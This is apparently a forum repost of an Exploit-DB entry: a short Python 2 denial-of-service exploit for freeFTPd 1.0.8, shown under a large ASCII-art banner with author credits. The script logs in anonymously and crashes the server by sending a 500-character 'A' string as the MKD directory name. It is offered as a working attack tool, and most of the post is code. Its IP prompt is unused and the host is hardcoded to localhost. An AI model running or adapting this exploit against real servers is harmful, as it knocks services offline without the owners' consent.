Exploit freeFTPd 1.0.8 - 'mkd' Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
40647
Проверка EDB
  1. Пройдено
Автор
SCRR1PTK1DD13
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2016-10-31
freeFTPd 1.0.8 - 'mkd' Denial of Service
Код:
from ftplib import FTP

print '''


                               `,;'++';,`                                      
                          `'++++++++++++++++;`                                 
                       .+++++++++++++++++++++++'`                              
                     ;++++++:`            `:++++++:                            
                   '++++'`   , +`. :; .``     .'++++;                          
                 :++++,  '+ `+.+.+`+':+:+ +:` +  :++++,                        
                ++++,    `+  +`+.+`+':+.+ +:'.+.   :++++                       
              ,+++;       +` +:':+`+',+`+,++.+:+ +,  '+++.                     
             '+++`  `++   ;+ ,+:'; ,: ;;+`++ +.+`+.   `+++;                    
            +++;  `: ++'   +      '+++   :++;++,+:  +   '+++                   
           +++,   ++' ,+       .;+++++',`     : +  ',+   :+++                  
          +++` ++ +:+ +:   .+++++++++++++++;    :  ++'+,,`,+++                 
         +++`  `+;.+'`   '++++++++++++++++++++.   ;+;+:.+` .+++                
        '++`  ++ +,.`  '++++++++++++++++++++++++.   +;.+`+  ,++;               
       :++,  +:++`'  ,+++++++++++++''++++++++++++    `+.+:   :++.              
       ++;  . +:+:  +++++++++'.          `;++++++++.  .+' ++  +++              
      +++  ;++ +:  ++++++++,                .+++++++;  ;:+;+   +++             
     :++  ;+,++  `+++++++,                    `++++++'  +,+,.+ `++.            
     ++: `+`+'.  ++++++'                        ;+++++'  +`;++  '++            
    '++   ,+,'  ++++++,                          .+++++;  ++     ++:           
    ++.   ' +  ++++++`                             +++++. `   '+.:++           
   ;++ +; +   ;+++++`                               +++++   :++ ; ++:          
   ++, '++   `+++++,                                `+++++  +` `. :++          
  ,++  ` ;+: +++++'                                  :++++`    ,+  ++`         
  ++; .+++` .+++++                                    +++++  '++:: ++'         
  ++` ;+':: +++++.                                     ++++` '`+++`.++         
 .++   `++  +++++                                      '++++  +:    ++`        
 '++ `++;  '++++`                                       ++++        ++;        
 ++, +.,;: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++:     
 ++` `+++``+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   
 ++ +;,`  ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
`++ ,'+++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
,++ `++'+ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::;+++++:
;++  `.,.                                                                 +++++
+++       '..':         ,++'`              ,+++`                          `++++
+++  +;+` ++++:        ++++++'            ++++++'                          ++++
+++ :.'`; ++++:       ++`   :+,          ++`   ,+:                         ++++
'++ `+++. ++++;       :       +          :       +                        ,++++
;++    :` ++++'                                                          `+++++
,++ `+;;+ +++++  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  :;;;;;;;;;;;;;;++++++.
`++  ++,+ +++++  :+++++++++++++++++++++++++++++++++++++  ++++++++++++++++++++' 
 ++  ` `, ;++++   ++++++++++++++++++++++++++++++++++++:  ++++++++++++++++++++  
 ++` .+++.`++++:  ++++++++++++++++++++++++++++++++++++  `++++++++++++++++++,   
 ++: ','+: +++++  :+++++,,,,,,,,,,,,,,,,,,,,,,,,;+++++  ++++:,:,,:,,+++,.      
 ;++  +:`, '++++`  +++++.                       +++++`  ++++  '.+'  ++,        
  ++   +++  +++++  :+++++                      ++++++  ;++++  ++.+  ++         
  ++, ';`+' +++++`  ++++++                    ++++++   ++++` +  +. :++         
  '++ :++;, .+++++   ++++++`                 ++++++,  +++++        ++:         
  `++ +` :+, +++++:  .++++++'              :++++++;  .++++. +`    `++          
   ++' ;++`  `+++++`  ,+++++++'`         :+++++++;   +++++  :++`  +++          
   ,++ ,:   + '+++++   .++++++++++';:;++++++++++:   +++++     ;+' ++`          
    +++   :+'  ++++++    ++++++++++++++++++++++`   +++++. ;+` ,  +++           
    ,++ :++`;+` ++++++`   :++++++++++++++++++'    +++++' `+,+;`;`++.           
     +++ : ++.+ `++++++:    :++++++++++++++;    ,+++++'   ++`+  +++            
     `++,  +;+`  `+++++++`    `:++++++++:`     ++++++' ++  ,+; ;++`            
      '++  :+  `'  ++++++++`                `+++++++;  +++   ;`++;             
       +++    `:`+  +++++++++:            ,++++++++,   +,++   +++              
        +++   +++;'  :+++++++++++';::;'+++++++++++   ;+ +,'  +++               
        ,+++  +++.+.:  +++++++++++++++++++++++++.  '' ++ +  +++`               
         ;++'  ` +`+`;. `+++++++++++++++++++++,   :,+,:+:  +++,                
          ;+++  ,++:'++`   ,+++++++++++++++;    ++ .++ `  +++:                 
           ;+++   + +`+  +;    .;'++++':`     ++.+':++   +++:                  
            :+++`  `++, :;+`+;            ::+ +,+`+.   .+++,                   
             .+++'  `,   +`:'+ +,+` +, +:+.++:';+ ++  ++++`                    
               ++++.    +':++: +;+` ': +:+ +.+ +'   :++++                      
                :++++.   . +,+,;+'` '; :'+`+'+    ,++++,                       
                  +++++:    ` +`+'` '; `++`     ;++++'                         
                   `++++++:         ;'  +    :++++++`                          
                     `+++++++':.       `,:+++++++'                             
                        .++++++++++++++++++++++.                               
                           `:'++++++++++++',                                   

                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: [email protected]   # 
                ##############################################


# Exploit Title: FreeFTPD_1.0.8_mkd_command_DoS_Exploit
# Date: 2016.10.30
# Exploit Author: Greg Priest
# Version: FreeFTPD_1.0.8
# Tested on: Windows XP, Windows 7 x64

'''

ftp_ip = raw_input("FTP server IP:")
killerstring = 'A' * 500
ftp = FTP('127.0.0.1')
ftp.login('anonymous', '[email protected]')
print ftp.login
print "SERVER KILLED"
FTP.mkd(ftp, killerstring)
 
Источник
www.exploit-db.com

Похожие темы